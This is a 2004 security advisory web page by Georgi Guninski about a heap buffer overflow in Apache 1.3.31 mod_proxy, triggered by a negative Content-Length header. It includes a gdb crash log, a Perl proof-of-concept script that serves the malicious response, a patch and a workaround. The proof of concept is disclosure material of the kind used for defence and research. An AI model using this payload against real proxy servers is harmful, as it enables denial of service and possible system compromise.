The version of mod_proxy shipped with Apache 1.3.31 and possibly earlier versions are susceptible to a buffer overflow via the Content-Length: header. This can lead to a denial of service and possible compromise of a vulnerable system.
4fd4a3dc2ff2887823678f53b78e0b6b9f804c4881d7f2160ca9ed11a8f808d5
<!DOCTYPE doctype PUBLIC "-//w3c//dtd html 4.0 transitional//en">
<html>
<head>
<link rel="stylesheet" title="Default" href="main.css">
<meta http-equiv="Content-Type"
content="text/html; charset=iso-8859-1">
<title>Buffer overflow in apache mod_proxy,yet still apache much
better than windows
</title>
</head>
<body style="color: rgb(0, 0, 0); background-color: rgb(255, 255, 255);">
<center>
<h2><span></span>Buffer overflow in apache mod_proxy,yet still apache
much better than windows<span></span></h2>
</center>
<table border="0" cellspacing="0" cellpadding="0" width="90%"
align="center">
<tbody>
<tr>
<td width="100%">
<table border="0" width="100%">
<tbody>
<tr>
<td valign="top" nowrap="nowrap" width="16%"
bgcolor="#f1f0ef"><img src="logo2.gif" alt="cyrillic logo"> <br>
<a href="index.html">Home</a> <br>
<b>Security</b> <br>
<a href="browsers.html" class="sux">Internet Explorer</a> <br>
<a href="win2k.html" class="sux">Windows 2000</a> <br>
<a href="exploit.html">AIX</a> <br>
<a href="netscape.html">Netscape</a> <br>
<a href="misc.html">Misc</a> <br>
<b>Other</b> <br>
<a href="greets.html">Links</a> <br>
<a href="me.html">Services</a> <br>
<a href="menews.html">In the news</a> <br>
<a href="rand/index.html">Random stuff</a> <br>
<b>Contact</b> <br>
<a href="mailto:guninski@guninski.com">guninski@guninski.com</a></td>
<td valign="top" width="84%">
<div style="margin-left: 1em;"><br>
Georgi Guninski security advisory #69, 2004<br>
<br>
Buffer overflow in apache mod_proxy,yet still apache much better than
windows<br>
<br>
Systems affected:<br>
modproxy from apache 1.3.31 and earlier<br>
<br>
Risk: Unknown - at least a crash, exploitability unknown<br>
Date: 10 June 2004<br>
<br>
Legal Notice:<br>
This Advisory is Copyright (c) 2004 Georgi Guninski.<br>
You may not modify it
and distribute it
or distribute parts of it without the author's
written permission - this especially applies to so called
"vulnerabilities databases" and securityfocus,
microsoft, cert and mitre.<br>
If you want
to link
to this
content use
the URL:<br>
<a href="http://www.guninski.com/modproxy1.html">http://www.guninski.com/modproxy1.html</a><br>
Anything in this document may change without notice.<br>
<br>
Disclaimer:<br>
The information in this advisory is
believed to be true
though it may be false.<br>
The opinions expressed in this advisory
and program are my own and
not of any
company. The usual
standard disclaimer applies, especially
the fact that Georgi Guninski is not liable
for any damages caused by direct or
indirect use of the
information or functionality provided by
this advisory or program. Georgi
Guninski bears no responsibility for
content or misuse of this advisory
or program or any derivatives thereof.<br>
<br>
Description:<br>
<br>
There is a buffer overflow in modproxy. It is heap based memcpy with
negative size.<br>
<br>
Details:<br>
<br>
The problem is in proxy_util.c:<br>
<code>n = ap_bread(f, buf, MIN((int)buf_size,<br>
(int)(len - total_bytes_rcvd)));</code><br>
<br>
clearly len can be negative.<br>
ap_bread leads to memcpy.<br>
<br>
Exploitation is unknown, but at least Freebsd 5.2.1 seems promising.<br>
The freebsd memcpy implementation copies backwards in this case, which
means that by playing with len it is possible to do copy from X to X+K
where K seems indepedent of len and X is about half the address space
on x86.<br>
Apache does some code execution after SEGV, which may be another
exploit vector.<br>
<br>
Some of the apache guys believe this bug is not exploitable, but they
didn't give a proof.<br>
<br>
To reproduce make apache fetch the output of pro3.pl.<br>
log from freebsd 5.2.1:<br>
<br>
<samp>Program received signal SIGSEGV, Segmentation fault.<br>
0x281c0113 in memcpy () from /lib/libc.so.5<br>
(gdb) info stack<br>
#0 0x281c0113 in memcpy () from /lib/libc.so.5<br>
#1 0x00000000 in ?? ()<br>
(gdb) p/x $esi<br>
$1 = 0xbbbffffe<br>
(gdb) p/x $edi<br>
$3 = 0xbbc05424<br>
(gdb) x/i $eip<br>
0x281c0113 <memcpy+67>: repz movsl %ds:(%esi),%es:(%edi)</samp><br>
<br>
---pro3.pl------<br>
<code>#!/usr/bin/perl<br>
<br>
# copyright Georgi Guninski<br>
# cannot be used in vulnerabilities databases an CVE - especially <br>
# securityfocus and mitre<br>
<br>
print "HTTP/1.1 200 MSUX\r\n";<br>
my $sta= -1213253396 ;<br>
print "Content-Length: " . $sta ."\r\n";<br>
print "\r\n";<br>
print "v" x 33000;</code><br>
----------------<br>
<br>
Fix:<br>
<br>
Unofficial fix from me, use at your risk.<br>
-------------------------------------<br>
<code>diff -u apache_1.3.31/src/modules/proxy/proxy_util.c
apache_1.3.31my/src/modules/proxy/proxy_util.c<br>
---
apache_1.3.31/src/modules/proxy/proxy_util.c
Tue Feb 17 23:52:22 2004<br>
+++
apache_1.3.31my/src/modules/proxy/proxy_util.c
Tue Jun 8 11:24:15 2004<br>
@@ -545,8 +545,8 @@<br>
n = ap_bread(f, buf, buf_size);<br>
}<br>
else {<br>
-
n = ap_bread(f, buf, MIN((int)buf_size,<br>
-
(int)(len - total_bytes_rcvd)));<br>
+
n = ap_bread(f, buf, MIN((size_t)buf_size,<br>
+
(size_t)(len - total_bytes_rcvd)));<br>
}<br>
}</code><br>
-------------------------------------<br>
<br>
Workaround:<br>
disable modproxy<br>
<br>
Vendor status:<br>
security@apache.org are aware of the bug<br>
<br>
Georgi Guninski<br>
http://www.guninski.com<br>
<br>
</div>
</td>
</tr>
</tbody>
</table>
</td>
</tr>
<tr>
<td> <br>
</td>
</tr>
</tbody>
</table>
<br>
<br>
<center>
<p>| <a href="index.html">Home</a> | <a href="browsers.html">Internet
Explorer</a> | <a href="win2k.html">Windows 2000</a> | <a
href="exploit.html">AIX</a> | <a href="netscape.html">Netscape</a> | <a
href="greets.html">Links</a> | <a href="index.html">More...</a> |</p>
</center>
<p><br>
</p>
<br>
<br>
</body>
</html>